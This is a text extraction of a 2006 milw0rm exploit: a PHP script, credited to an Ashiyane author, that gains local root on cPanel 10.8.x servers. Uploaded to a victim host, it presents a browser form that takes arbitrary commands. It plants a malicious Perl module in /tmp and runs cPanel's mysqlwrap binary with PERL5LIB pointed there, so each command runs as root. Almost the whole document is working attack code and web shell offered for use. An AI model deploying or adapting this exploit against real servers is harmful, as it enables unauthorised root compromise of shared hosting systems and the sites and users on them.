cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit php.pdf

1 <!− for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have 2 <!− bash shell access on victim server but with this new exploit you only need 3 <!− to upload php file and run this into browser on victim servers. 4 <!− then you have root Access and you can case anything .... 5 <!− Coded by nima salehi ( nima@ashiyane.ir ) 6 <!− Ashiyane Security Corporation www.Ashiyane.ir > 7 <title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title> 8 <center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"> 9 <? 10 11 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 12 { 13 echo " Sorry Safe−mode Is On ( Script Not Work On This Server ) "; 14 echo " Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir"; 15 exit(); 16 } 17 18 $disablef = @ini_get("disable_functions"); 19 if (!empty($disablef)) 20 { 21 $disablef = str_replace(" ","",$disablef); 22 $disablef = explode(",",$disablef); 23 if (in_array("passthru",$disablef)) 24 { 25 echo " Sorry Passthru Is Disable ( Script Not Work On This Server ) "; 26 echo " Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir"; 27 exit(); 28 } 29 } 30 31 ?> 32 33 <form method="POST" action="<?php echo $surl; ?>"> 34 Command : <input type="text" name="c" size="40"> 35 <input type="submit" value=" Run " name="B1"></form> 36 <textarea cols="60" rows="20" readonly> 37 <?php 38 $cmd=$_POST[’c’]; 39 if ( $cmd != "" ) 40 { 41 $f=fopen("/tmp/strict.pm", "w"); 42 fputs($f,’system("’.$cmd.’");’); 43 fclose($f); 44 passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima"); 45 } 46 ?> 47 </textarea> 48 49 Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir 50 </center> 51 52 # milw0rm.com [2006−10−13] Page 1/1 cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit ph